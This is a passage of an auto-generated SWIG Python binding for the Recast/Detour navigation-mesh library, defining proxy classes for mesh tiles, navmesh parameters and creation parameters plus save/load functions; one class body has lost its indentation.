    if _newclass:bmax = _swig_property(_pyrecast.dtMeshHeader_bmax_get, _pyrecast.dtMeshHeader_bmax_set)
    __swig_setmethods__["bvQuantFactor"] = _pyrecast.dtMeshHeader_bvQuantFactor_set
    __swig_getmethods__["bvQuantFactor"] = _pyrecast.dtMeshHeader_bvQuantFactor_get
    if _newclass:bvQuantFactor = _swig_property(_pyrecast.dtMeshHeader_bvQuantFactor_get, _pyrecast.dtMeshHeader_bvQuantFactor_set)
    def __init__(self):
        this = _pyrecast.new_dtMeshHeader()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtMeshHeader
    __del__ = lambda self : None;
dtMeshHeader_swigregister = _pyrecast.dtMeshHeader_swigregister
dtMeshHeader_swigregister(dtMeshHeader)
class dtMeshTile(_object):
    """SWIG proxy for the C++ dtMeshTile struct: one navigation-mesh tile
    (header plus polygon/vertex/link/detail/BV-tree arrays and raw data)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtMeshTile, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtMeshTile, name)
    __repr__ = _swig_repr
    __swig_setmethods__["salt"] = _pyrecast.dtMeshTile_salt_set
    __swig_getmethods__["salt"] = _pyrecast.dtMeshTile_salt_get
    if _newclass:salt = _swig_property(_pyrecast.dtMeshTile_salt_get, _pyrecast.dtMeshTile_salt_set)
    __swig_setmethods__["linksFreeList"] = _pyrecast.dtMeshTile_linksFreeList_set
    __swig_getmethods__["linksFreeList"] = _pyrecast.dtMeshTile_linksFreeList_get
    if _newclass:linksFreeList = _swig_property(_pyrecast.dtMeshTile_linksFreeList_get, _pyrecast.dtMeshTile_linksFreeList_set)
    __swig_setmethods__["header"] = _pyrecast.dtMeshTile_header_set
    __swig_getmethods__["header"] = _pyrecast.dtMeshTile_header_get
    if _newclass:header = _swig_property(_pyrecast.dtMeshTile_header_get, _pyrecast.dtMeshTile_header_set)
    __swig_setmethods__["polys"] = _pyrecast.dtMeshTile_polys_set
    __swig_getmethods__["polys"] = _pyrecast.dtMeshTile_polys_get
    if _newclass:polys = _swig_property(_pyrecast.dtMeshTile_polys_get, _pyrecast.dtMeshTile_polys_set)
    __swig_setmethods__["verts"] = _pyrecast.dtMeshTile_verts_set
    __swig_getmethods__["verts"] = _pyrecast.dtMeshTile_verts_get
    if _newclass:verts = _swig_property(_pyrecast.dtMeshTile_verts_get, _pyrecast.dtMeshTile_verts_set)
    __swig_setmethods__["links"] = _pyrecast.dtMeshTile_links_set
    __swig_getmethods__["links"] = _pyrecast.dtMeshTile_links_get
    if _newclass:links = _swig_property(_pyrecast.dtMeshTile_links_get, _pyrecast.dtMeshTile_links_set)
    __swig_setmethods__["detailMeshes"] = _pyrecast.dtMeshTile_detailMeshes_set
    __swig_getmethods__["detailMeshes"] = _pyrecast.dtMeshTile_detailMeshes_get
    if _newclass:detailMeshes = _swig_property(_pyrecast.dtMeshTile_detailMeshes_get, _pyrecast.dtMeshTile_detailMeshes_set)
    __swig_setmethods__["detailVerts"] = _pyrecast.dtMeshTile_detailVerts_set
    __swig_getmethods__["detailVerts"] = _pyrecast.dtMeshTile_detailVerts_get
    if _newclass:detailVerts = _swig_property(_pyrecast.dtMeshTile_detailVerts_get, _pyrecast.dtMeshTile_detailVerts_set)
    __swig_setmethods__["detailTris"] = _pyrecast.dtMeshTile_detailTris_set
    __swig_getmethods__["detailTris"] = _pyrecast.dtMeshTile_detailTris_get
    if _newclass:detailTris = _swig_property(_pyrecast.dtMeshTile_detailTris_get, _pyrecast.dtMeshTile_detailTris_set)
    __swig_setmethods__["bvTree"] = _pyrecast.dtMeshTile_bvTree_set
    __swig_getmethods__["bvTree"] = _pyrecast.dtMeshTile_bvTree_get
    if _newclass:bvTree = _swig_property(_pyrecast.dtMeshTile_bvTree_get, _pyrecast.dtMeshTile_bvTree_set)
    __swig_setmethods__["offMeshCons"] = _pyrecast.dtMeshTile_offMeshCons_set
    __swig_getmethods__["offMeshCons"] = _pyrecast.dtMeshTile_offMeshCons_get
    if _newclass:offMeshCons = _swig_property(_pyrecast.dtMeshTile_offMeshCons_get, _pyrecast.dtMeshTile_offMeshCons_set)
    __swig_setmethods__["data"] = _pyrecast.dtMeshTile_data_set
    __swig_getmethods__["data"] = _pyrecast.dtMeshTile_data_get
    if _newclass:data = _swig_property(_pyrecast.dtMeshTile_data_get, _pyrecast.dtMeshTile_data_set)
    __swig_setmethods__["dataSize"] = _pyrecast.dtMeshTile_dataSize_set
    __swig_getmethods__["dataSize"] = _pyrecast.dtMeshTile_dataSize_get
    if _newclass:dataSize = _swig_property(_pyrecast.dtMeshTile_dataSize_get, _pyrecast.dtMeshTile_dataSize_set)
    __swig_setmethods__["flags"] = _pyrecast.dtMeshTile_flags_set
    __swig_getmethods__["flags"] = _pyrecast.dtMeshTile_flags_get
    if _newclass:flags = _swig_property(_pyrecast.dtMeshTile_flags_get, _pyrecast.dtMeshTile_flags_set)
    __swig_setmethods__["next"] = _pyrecast.dtMeshTile_next_set
    __swig_getmethods__["next"] = _pyrecast.dtMeshTile_next_get
    if _newclass:next = _swig_property(_pyrecast.dtMeshTile_next_get, _pyrecast.dtMeshTile_next_set)
    def __init__(self):
        this = _pyrecast.new_dtMeshTile()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtMeshTile
    __del__ = lambda self : None;
dtMeshTile_swigregister = _pyrecast.dtMeshTile_swigregister
dtMeshTile_swigregister(dtMeshTile)
class dtNavMeshParams(_object):
    """SWIG proxy for the C++ dtNavMeshParams struct (fields: orig, tileWidth,
    tileHeight, maxTiles, maxPolys)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshParams, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshParams, name)
    __repr__ = _swig_repr
    __swig_setmethods__["orig"] = _pyrecast.dtNavMeshParams_orig_set
    __swig_getmethods__["orig"] = _pyrecast.dtNavMeshParams_orig_get
    if _newclass:orig = _swig_property(_pyrecast.dtNavMeshParams_orig_get, _pyrecast.dtNavMeshParams_orig_set)
    __swig_setmethods__["tileWidth"] = _pyrecast.dtNavMeshParams_tileWidth_set
    __swig_getmethods__["tileWidth"] = _pyrecast.dtNavMeshParams_tileWidth_get
    if _newclass:tileWidth = _swig_property(_pyrecast.dtNavMeshParams_tileWidth_get, _pyrecast.dtNavMeshParams_tileWidth_set)
    __swig_setmethods__["tileHeight"] = _pyrecast.dtNavMeshParams_tileHeight_set
    __swig_getmethods__["tileHeight"] = _pyrecast.dtNavMeshParams_tileHeight_get
    if _newclass:tileHeight = _swig_property(_pyrecast.dtNavMeshParams_tileHeight_get, _pyrecast.dtNavMeshParams_tileHeight_set)
    __swig_setmethods__["maxTiles"] = _pyrecast.dtNavMeshParams_maxTiles_set
    __swig_getmethods__["maxTiles"] = _pyrecast.dtNavMeshParams_maxTiles_get
    if _newclass:maxTiles = _swig_property(_pyrecast.dtNavMeshParams_maxTiles_get, _pyrecast.dtNavMeshParams_maxTiles_set)
    __swig_setmethods__["maxPolys"] = _pyrecast.dtNavMeshParams_maxPolys_set
    __swig_getmethods__["maxPolys"] = _pyrecast.dtNavMeshParams_maxPolys_get
    if _newclass:maxPolys = _swig_property(_pyrecast.dtNavMeshParams_maxPolys_get, _pyrecast.dtNavMeshParams_maxPolys_set)
    def __init__(self):
        this = _pyrecast.new_dtNavMeshParams()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNavMeshParams
    __del__ = lambda self : None;
dtNavMeshParams_swigregister = _pyrecast.dtNavMeshParams_swigregister
dtNavMeshParams_swigregister(dtNavMeshParams)
class dtNavMesh(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMesh, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNavMesh, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtNavMesh()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNavMesh
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtNavMesh_init(self, *args)
def getParams(self): return _pyrecast.dtNavMesh_getParams(self)
def addTile(self, *args): return _pyrecast.dtNavMesh_addTile(self, *args)
def removeTile(self, *args): return _pyrecast.dtNavMesh_removeTile(self, *args)
def calcTileLoc(self, *args): return _pyrecast.dtNavMesh_calcTileLoc(self, *args)
def getTileAt(self, *args): return _pyrecast.dtNavMesh_getTileAt(self, *args)
def getTileRefAt(self, *args): return _pyrecast.dtNavMesh_getTileRefAt(self, *args)
def getTileRef(self, *args): return _pyrecast.dtNavMesh_getTileRef(self, *args)
def getTileByRef(self, *args): return _pyrecast.dtNavMesh_getTileByRef(self, *args)
def getMaxTiles(self): return _pyrecast.dtNavMesh_getMaxTiles(self)
def getTileAndPolyByRef(self, *args): return _pyrecast.dtNavMesh_getTileAndPolyByRef(self, *args)
def getTileAndPolyByRefUnsafe(self, *args): return _pyrecast.dtNavMesh_getTileAndPolyByRefUnsafe(self, *args)
def isValidPolyRef(self, *args): return _pyrecast.dtNavMesh_isValidPolyRef(self, *args)
def getPolyRefBase(self, *args): return _pyrecast.dtNavMesh_getPolyRefBase(self, *args)
def getOffMeshConnectionPolyEndPoints(self, *args): return _pyrecast.dtNavMesh_getOffMeshConnectionPolyEndPoints(self, *args)
def getOffMeshConnectionByRef(self, *args): return _pyrecast.dtNavMesh_getOffMeshConnectionByRef(self, *args)
def setPolyFlags(self, *args): return _pyrecast.dtNavMesh_setPolyFlags(self, *args)
def getPolyFlags(self, *args): return _pyrecast.dtNavMesh_getPolyFlags(self, *args)
def setPolyArea(self, *args): return _pyrecast.dtNavMesh_setPolyArea(self, *args)
def getPolyArea(self, *args): return _pyrecast.dtNavMesh_getPolyArea(self, *args)
def getTileStateSize(self, *args): return _pyrecast.dtNavMesh_getTileStateSize(self, *args)
def storeTileState(self, *args): return _pyrecast.dtNavMesh_storeTileState(self, *args)
def restoreTileState(self, *args): return _pyrecast.dtNavMesh_restoreTileState(self, *args)
def encodePolyId(self, *args): return _pyrecast.dtNavMesh_encodePolyId(self, *args)
def decodePolyId(self, *args): return _pyrecast.dtNavMesh_decodePolyId(self, *args)
def decodePolyIdSalt(self, *args): return _pyrecast.dtNavMesh_decodePolyIdSalt(self, *args)
def decodePolyIdTile(self, *args): return _pyrecast.dtNavMesh_decodePolyIdTile(self, *args)
def decodePolyIdPoly(self, *args): return _pyrecast.dtNavMesh_decodePolyIdPoly(self, *args)
def getTile(self, *args): return _pyrecast.dtNavMesh_getTile(self, *args)
def getTilesAt(self, *args): return _pyrecast.dtNavMesh_getTilesAt(self, *args)
def getNeighbourTilesAt(self, *args): return _pyrecast.dtNavMesh_getNeighbourTilesAt(self, *args)
def findConnectingPolys(self, *args): return _pyrecast.dtNavMesh_findConnectingPolys(self, *args)
def connectIntLinks(self, *args): return _pyrecast.dtNavMesh_connectIntLinks(self, *args)
def baseOffMeshLinks(self, *args): return _pyrecast.dtNavMesh_baseOffMeshLinks(self, *args)
def connectExtLinks(self, *args): return _pyrecast.dtNavMesh_connectExtLinks(self, *args)
def connectExtOffMeshLinks(self, *args): return _pyrecast.dtNavMesh_connectExtOffMeshLinks(self, *args)
def unconnectExtLinks(self, *args): return _pyrecast.dtNavMesh_unconnectExtLinks(self, *args)
def queryPolygonsInTile(self, *args): return _pyrecast.dtNavMesh_queryPolygonsInTile(self, *args)
def findNearestPolyInTile(self, *args): return _pyrecast.dtNavMesh_findNearestPolyInTile(self, *args)
def closestPointOnPolyInTile(self, *args): return _pyrecast.dtNavMesh_closestPointOnPolyInTile(self, *args)
__swig_setmethods__["m_params"] = _pyrecast.dtNavMesh_m_params_set
__swig_getmethods__["m_params"] = _pyrecast.dtNavMesh_m_params_get
if _newclass:m_params = _swig_property(_pyrecast.dtNavMesh_m_params_get, _pyrecast.dtNavMesh_m_params_set)
__swig_setmethods__["m_orig"] = _pyrecast.dtNavMesh_m_orig_set
__swig_getmethods__["m_orig"] = _pyrecast.dtNavMesh_m_orig_get
if _newclass:m_orig = _swig_property(_pyrecast.dtNavMesh_m_orig_get, _pyrecast.dtNavMesh_m_orig_set)
__swig_setmethods__["m_tileWidth"] = _pyrecast.dtNavMesh_m_tileWidth_set
__swig_getmethods__["m_tileWidth"] = _pyrecast.dtNavMesh_m_tileWidth_get
if _newclass:m_tileWidth = _swig_property(_pyrecast.dtNavMesh_m_tileWidth_get, _pyrecast.dtNavMesh_m_tileWidth_set)
__swig_setmethods__["m_tileHeight"] = _pyrecast.dtNavMesh_m_tileHeight_set
__swig_getmethods__["m_tileHeight"] = _pyrecast.dtNavMesh_m_tileHeight_get
if _newclass:m_tileHeight = _swig_property(_pyrecast.dtNavMesh_m_tileHeight_get, _pyrecast.dtNavMesh_m_tileHeight_set)
__swig_setmethods__["m_maxTiles"] = _pyrecast.dtNavMesh_m_maxTiles_set
__swig_getmethods__["m_maxTiles"] = _pyrecast.dtNavMesh_m_maxTiles_get
if _newclass:m_maxTiles = _swig_property(_pyrecast.dtNavMesh_m_maxTiles_get, _pyrecast.dtNavMesh_m_maxTiles_set)
__swig_setmethods__["m_tileLutSize"] = _pyrecast.dtNavMesh_m_tileLutSize_set
__swig_getmethods__["m_tileLutSize"] = _pyrecast.dtNavMesh_m_tileLutSize_get
if _newclass:m_tileLutSize = _swig_property(_pyrecast.dtNavMesh_m_tileLutSize_get, _pyrecast.dtNavMesh_m_tileLutSize_set)
__swig_setmethods__["m_tileLutMask"] = _pyrecast.dtNavMesh_m_tileLutMask_set
__swig_getmethods__["m_tileLutMask"] = _pyrecast.dtNavMesh_m_tileLutMask_get
if _newclass:m_tileLutMask = _swig_property(_pyrecast.dtNavMesh_m_tileLutMask_get, _pyrecast.dtNavMesh_m_tileLutMask_set)
__swig_setmethods__["m_posLookup"] = _pyrecast.dtNavMesh_m_posLookup_set
__swig_getmethods__["m_posLookup"] = _pyrecast.dtNavMesh_m_posLookup_get
if _newclass:m_posLookup = _swig_property(_pyrecast.dtNavMesh_m_posLookup_get, _pyrecast.dtNavMesh_m_posLookup_set)
__swig_setmethods__["m_nextFree"] = _pyrecast.dtNavMesh_m_nextFree_set
__swig_getmethods__["m_nextFree"] = _pyrecast.dtNavMesh_m_nextFree_get
if _newclass:m_nextFree = _swig_property(_pyrecast.dtNavMesh_m_nextFree_get, _pyrecast.dtNavMesh_m_nextFree_set)
__swig_setmethods__["m_tiles"] = _pyrecast.dtNavMesh_m_tiles_set
__swig_getmethods__["m_tiles"] = _pyrecast.dtNavMesh_m_tiles_get
if _newclass:m_tiles = _swig_property(_pyrecast.dtNavMesh_m_tiles_get, _pyrecast.dtNavMesh_m_tiles_set)
__swig_setmethods__["m_saltBits"] = _pyrecast.dtNavMesh_m_saltBits_set
__swig_getmethods__["m_saltBits"] = _pyrecast.dtNavMesh_m_saltBits_get
if _newclass:m_saltBits = _swig_property(_pyrecast.dtNavMesh_m_saltBits_get, _pyrecast.dtNavMesh_m_saltBits_set)
__swig_setmethods__["m_tileBits"] = _pyrecast.dtNavMesh_m_tileBits_set
__swig_getmethods__["m_tileBits"] = _pyrecast.dtNavMesh_m_tileBits_get
if _newclass:m_tileBits = _swig_property(_pyrecast.dtNavMesh_m_tileBits_get, _pyrecast.dtNavMesh_m_tileBits_set)
__swig_setmethods__["m_polyBits"] = _pyrecast.dtNavMesh_m_polyBits_set
__swig_getmethods__["m_polyBits"] = _pyrecast.dtNavMesh_m_polyBits_get
if _newclass:m_polyBits = _swig_property(_pyrecast.dtNavMesh_m_polyBits_get, _pyrecast.dtNavMesh_m_polyBits_set)
dtNavMesh_swigregister = _pyrecast.dtNavMesh_swigregister
dtNavMesh_swigregister(dtNavMesh)
def dtAllocNavMesh():
    """Proxy for _pyrecast.dtAllocNavMesh (allocate a navmesh object)."""
    return _pyrecast.dtAllocNavMesh()
# SWIG fast-path pattern: the name is immediately rebound to the raw C entry
# point, so the Python shim above exists only for introspection.
dtAllocNavMesh = _pyrecast.dtAllocNavMesh
def dtFreeNavMesh(*args):
    """Proxy for _pyrecast.dtFreeNavMesh (release a navmesh object)."""
    return _pyrecast.dtFreeNavMesh(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtFreeNavMesh = _pyrecast.dtFreeNavMesh
# SWIG proxy for the C++ struct dtNavMeshCreateParams.  Generated code:
# attribute reads/writes are routed through the class-level getter/setter
# tables below by the _swig_getattr/_swig_setattr lambdas.  Presumably this is
# the input bundle consumed by dtCreateNavMeshData -- confirm against the
# Detour documentation before relying on individual field semantics.
class dtNavMeshCreateParams(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshCreateParams, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshCreateParams, name)
    __repr__ = _swig_repr
    # Each struct field: C setter/getter registered in the tables, plus a real
    # property when running on new-style classes (_newclass).
    __swig_setmethods__["verts"] = _pyrecast.dtNavMeshCreateParams_verts_set
    __swig_getmethods__["verts"] = _pyrecast.dtNavMeshCreateParams_verts_get
    if _newclass:verts = _swig_property(_pyrecast.dtNavMeshCreateParams_verts_get, _pyrecast.dtNavMeshCreateParams_verts_set)
    __swig_setmethods__["vertCount"] = _pyrecast.dtNavMeshCreateParams_vertCount_set
    __swig_getmethods__["vertCount"] = _pyrecast.dtNavMeshCreateParams_vertCount_get
    if _newclass:vertCount = _swig_property(_pyrecast.dtNavMeshCreateParams_vertCount_get, _pyrecast.dtNavMeshCreateParams_vertCount_set)
    __swig_setmethods__["polys"] = _pyrecast.dtNavMeshCreateParams_polys_set
    __swig_getmethods__["polys"] = _pyrecast.dtNavMeshCreateParams_polys_get
    if _newclass:polys = _swig_property(_pyrecast.dtNavMeshCreateParams_polys_get, _pyrecast.dtNavMeshCreateParams_polys_set)
    __swig_setmethods__["polyFlags"] = _pyrecast.dtNavMeshCreateParams_polyFlags_set
    __swig_getmethods__["polyFlags"] = _pyrecast.dtNavMeshCreateParams_polyFlags_get
    if _newclass:polyFlags = _swig_property(_pyrecast.dtNavMeshCreateParams_polyFlags_get, _pyrecast.dtNavMeshCreateParams_polyFlags_set)
    __swig_setmethods__["polyAreas"] = _pyrecast.dtNavMeshCreateParams_polyAreas_set
    __swig_getmethods__["polyAreas"] = _pyrecast.dtNavMeshCreateParams_polyAreas_get
    if _newclass:polyAreas = _swig_property(_pyrecast.dtNavMeshCreateParams_polyAreas_get, _pyrecast.dtNavMeshCreateParams_polyAreas_set)
    __swig_setmethods__["polyCount"] = _pyrecast.dtNavMeshCreateParams_polyCount_set
    __swig_getmethods__["polyCount"] = _pyrecast.dtNavMeshCreateParams_polyCount_get
    if _newclass:polyCount = _swig_property(_pyrecast.dtNavMeshCreateParams_polyCount_get, _pyrecast.dtNavMeshCreateParams_polyCount_set)
    __swig_setmethods__["nvp"] = _pyrecast.dtNavMeshCreateParams_nvp_set
    __swig_getmethods__["nvp"] = _pyrecast.dtNavMeshCreateParams_nvp_get
    if _newclass:nvp = _swig_property(_pyrecast.dtNavMeshCreateParams_nvp_get, _pyrecast.dtNavMeshCreateParams_nvp_set)
    __swig_setmethods__["detailMeshes"] = _pyrecast.dtNavMeshCreateParams_detailMeshes_set
    __swig_getmethods__["detailMeshes"] = _pyrecast.dtNavMeshCreateParams_detailMeshes_get
    if _newclass:detailMeshes = _swig_property(_pyrecast.dtNavMeshCreateParams_detailMeshes_get, _pyrecast.dtNavMeshCreateParams_detailMeshes_set)
    __swig_setmethods__["detailVerts"] = _pyrecast.dtNavMeshCreateParams_detailVerts_set
    __swig_getmethods__["detailVerts"] = _pyrecast.dtNavMeshCreateParams_detailVerts_get
    if _newclass:detailVerts = _swig_property(_pyrecast.dtNavMeshCreateParams_detailVerts_get, _pyrecast.dtNavMeshCreateParams_detailVerts_set)
    __swig_setmethods__["detailVertsCount"] = _pyrecast.dtNavMeshCreateParams_detailVertsCount_set
    __swig_getmethods__["detailVertsCount"] = _pyrecast.dtNavMeshCreateParams_detailVertsCount_get
    if _newclass:detailVertsCount = _swig_property(_pyrecast.dtNavMeshCreateParams_detailVertsCount_get, _pyrecast.dtNavMeshCreateParams_detailVertsCount_set)
    __swig_setmethods__["detailTris"] = _pyrecast.dtNavMeshCreateParams_detailTris_set
    __swig_getmethods__["detailTris"] = _pyrecast.dtNavMeshCreateParams_detailTris_get
    if _newclass:detailTris = _swig_property(_pyrecast.dtNavMeshCreateParams_detailTris_get, _pyrecast.dtNavMeshCreateParams_detailTris_set)
    __swig_setmethods__["detailTriCount"] = _pyrecast.dtNavMeshCreateParams_detailTriCount_set
    __swig_getmethods__["detailTriCount"] = _pyrecast.dtNavMeshCreateParams_detailTriCount_get
    if _newclass:detailTriCount = _swig_property(_pyrecast.dtNavMeshCreateParams_detailTriCount_get, _pyrecast.dtNavMeshCreateParams_detailTriCount_set)
    __swig_setmethods__["offMeshConVerts"] = _pyrecast.dtNavMeshCreateParams_offMeshConVerts_set
    __swig_getmethods__["offMeshConVerts"] = _pyrecast.dtNavMeshCreateParams_offMeshConVerts_get
    if _newclass:offMeshConVerts = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConVerts_get, _pyrecast.dtNavMeshCreateParams_offMeshConVerts_set)
    __swig_setmethods__["offMeshConRad"] = _pyrecast.dtNavMeshCreateParams_offMeshConRad_set
    __swig_getmethods__["offMeshConRad"] = _pyrecast.dtNavMeshCreateParams_offMeshConRad_get
    if _newclass:offMeshConRad = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConRad_get, _pyrecast.dtNavMeshCreateParams_offMeshConRad_set)
    __swig_setmethods__["offMeshConFlags"] = _pyrecast.dtNavMeshCreateParams_offMeshConFlags_set
    __swig_getmethods__["offMeshConFlags"] = _pyrecast.dtNavMeshCreateParams_offMeshConFlags_get
    if _newclass:offMeshConFlags = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConFlags_get, _pyrecast.dtNavMeshCreateParams_offMeshConFlags_set)
    __swig_setmethods__["offMeshConAreas"] = _pyrecast.dtNavMeshCreateParams_offMeshConAreas_set
    __swig_getmethods__["offMeshConAreas"] = _pyrecast.dtNavMeshCreateParams_offMeshConAreas_get
    if _newclass:offMeshConAreas = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConAreas_get, _pyrecast.dtNavMeshCreateParams_offMeshConAreas_set)
    __swig_setmethods__["offMeshConDir"] = _pyrecast.dtNavMeshCreateParams_offMeshConDir_set
    __swig_getmethods__["offMeshConDir"] = _pyrecast.dtNavMeshCreateParams_offMeshConDir_get
    if _newclass:offMeshConDir = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConDir_get, _pyrecast.dtNavMeshCreateParams_offMeshConDir_set)
    __swig_setmethods__["offMeshConUserID"] = _pyrecast.dtNavMeshCreateParams_offMeshConUserID_set
    __swig_getmethods__["offMeshConUserID"] = _pyrecast.dtNavMeshCreateParams_offMeshConUserID_get
    if _newclass:offMeshConUserID = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConUserID_get, _pyrecast.dtNavMeshCreateParams_offMeshConUserID_set)
    __swig_setmethods__["offMeshConCount"] = _pyrecast.dtNavMeshCreateParams_offMeshConCount_set
    __swig_getmethods__["offMeshConCount"] = _pyrecast.dtNavMeshCreateParams_offMeshConCount_get
    if _newclass:offMeshConCount = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConCount_get, _pyrecast.dtNavMeshCreateParams_offMeshConCount_set)
    __swig_setmethods__["userId"] = _pyrecast.dtNavMeshCreateParams_userId_set
    __swig_getmethods__["userId"] = _pyrecast.dtNavMeshCreateParams_userId_get
    if _newclass:userId = _swig_property(_pyrecast.dtNavMeshCreateParams_userId_get, _pyrecast.dtNavMeshCreateParams_userId_set)
    __swig_setmethods__["tileX"] = _pyrecast.dtNavMeshCreateParams_tileX_set
    __swig_getmethods__["tileX"] = _pyrecast.dtNavMeshCreateParams_tileX_get
    if _newclass:tileX = _swig_property(_pyrecast.dtNavMeshCreateParams_tileX_get, _pyrecast.dtNavMeshCreateParams_tileX_set)
    __swig_setmethods__["tileY"] = _pyrecast.dtNavMeshCreateParams_tileY_set
    __swig_getmethods__["tileY"] = _pyrecast.dtNavMeshCreateParams_tileY_get
    if _newclass:tileY = _swig_property(_pyrecast.dtNavMeshCreateParams_tileY_get, _pyrecast.dtNavMeshCreateParams_tileY_set)
    __swig_setmethods__["tileLayer"] = _pyrecast.dtNavMeshCreateParams_tileLayer_set
    __swig_getmethods__["tileLayer"] = _pyrecast.dtNavMeshCreateParams_tileLayer_get
    if _newclass:tileLayer = _swig_property(_pyrecast.dtNavMeshCreateParams_tileLayer_get, _pyrecast.dtNavMeshCreateParams_tileLayer_set)
    __swig_setmethods__["bmin"] = _pyrecast.dtNavMeshCreateParams_bmin_set
    __swig_getmethods__["bmin"] = _pyrecast.dtNavMeshCreateParams_bmin_get
    if _newclass:bmin = _swig_property(_pyrecast.dtNavMeshCreateParams_bmin_get, _pyrecast.dtNavMeshCreateParams_bmin_set)
    __swig_setmethods__["bmax"] = _pyrecast.dtNavMeshCreateParams_bmax_set
    __swig_getmethods__["bmax"] = _pyrecast.dtNavMeshCreateParams_bmax_get
    if _newclass:bmax = _swig_property(_pyrecast.dtNavMeshCreateParams_bmax_get, _pyrecast.dtNavMeshCreateParams_bmax_set)
    __swig_setmethods__["walkableHeight"] = _pyrecast.dtNavMeshCreateParams_walkableHeight_set
    __swig_getmethods__["walkableHeight"] = _pyrecast.dtNavMeshCreateParams_walkableHeight_get
    if _newclass:walkableHeight = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableHeight_get, _pyrecast.dtNavMeshCreateParams_walkableHeight_set)
    __swig_setmethods__["walkableRadius"] = _pyrecast.dtNavMeshCreateParams_walkableRadius_set
    __swig_getmethods__["walkableRadius"] = _pyrecast.dtNavMeshCreateParams_walkableRadius_get
    if _newclass:walkableRadius = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableRadius_get, _pyrecast.dtNavMeshCreateParams_walkableRadius_set)
    __swig_setmethods__["walkableClimb"] = _pyrecast.dtNavMeshCreateParams_walkableClimb_set
    __swig_getmethods__["walkableClimb"] = _pyrecast.dtNavMeshCreateParams_walkableClimb_get
    if _newclass:walkableClimb = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableClimb_get, _pyrecast.dtNavMeshCreateParams_walkableClimb_set)
    __swig_setmethods__["cs"] = _pyrecast.dtNavMeshCreateParams_cs_set
    __swig_getmethods__["cs"] = _pyrecast.dtNavMeshCreateParams_cs_get
    if _newclass:cs = _swig_property(_pyrecast.dtNavMeshCreateParams_cs_get, _pyrecast.dtNavMeshCreateParams_cs_set)
    __swig_setmethods__["ch"] = _pyrecast.dtNavMeshCreateParams_ch_set
    __swig_getmethods__["ch"] = _pyrecast.dtNavMeshCreateParams_ch_get
    if _newclass:ch = _swig_property(_pyrecast.dtNavMeshCreateParams_ch_get, _pyrecast.dtNavMeshCreateParams_ch_set)
    __swig_setmethods__["buildBvTree"] = _pyrecast.dtNavMeshCreateParams_buildBvTree_set
    __swig_getmethods__["buildBvTree"] = _pyrecast.dtNavMeshCreateParams_buildBvTree_get
    if _newclass:buildBvTree = _swig_property(_pyrecast.dtNavMeshCreateParams_buildBvTree_get, _pyrecast.dtNavMeshCreateParams_buildBvTree_set)
    def __init__(self):
        # Allocate the underlying C struct and bind its pointer to this proxy.
        this = _pyrecast.new_dtNavMeshCreateParams()
        # SWIG idiom (bare except is generator-emitted; kept byte-for-byte):
        # append to an existing `this` list if present, else create it.
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNavMeshCreateParams
    __del__ = lambda self : None;
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtNavMeshCreateParams_swigregister = _pyrecast.dtNavMeshCreateParams_swigregister
dtNavMeshCreateParams_swigregister(dtNavMeshCreateParams)
def dtCreateNavMeshData(*args):
    """Proxy for _pyrecast.dtCreateNavMeshData."""
    return _pyrecast.dtCreateNavMeshData(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtCreateNavMeshData = _pyrecast.dtCreateNavMeshData
def dtNavMeshHeaderSwapEndian(*args):
    """Proxy for _pyrecast.dtNavMeshHeaderSwapEndian."""
    return _pyrecast.dtNavMeshHeaderSwapEndian(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtNavMeshHeaderSwapEndian = _pyrecast.dtNavMeshHeaderSwapEndian
def dtNavMeshDataSwapEndian(*args):
    """Proxy for _pyrecast.dtNavMeshDataSwapEndian."""
    return _pyrecast.dtNavMeshDataSwapEndian(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtNavMeshDataSwapEndian = _pyrecast.dtNavMeshDataSwapEndian
def dtSaveNavMesh(*args):
    """Proxy for _pyrecast.dtSaveNavMesh."""
    return _pyrecast.dtSaveNavMesh(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtSaveNavMesh = _pyrecast.dtSaveNavMesh
def dtLoadMesh(*args):
    """Proxy for _pyrecast.dtLoadMesh."""
    return _pyrecast.dtLoadMesh(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtLoadMesh = _pyrecast.dtLoadMesh
# SWIG proxy for the C++ class dtQueryFilter.  All methods forward to the flat
# C wrappers in _pyrecast; include/exclude flags and per-area costs control
# which polygons navmesh queries accept (per Detour convention -- confirm
# exact semantics against the Detour dtQueryFilter documentation).
class dtQueryFilter(_object):
    __swig_setmethods__ = {}
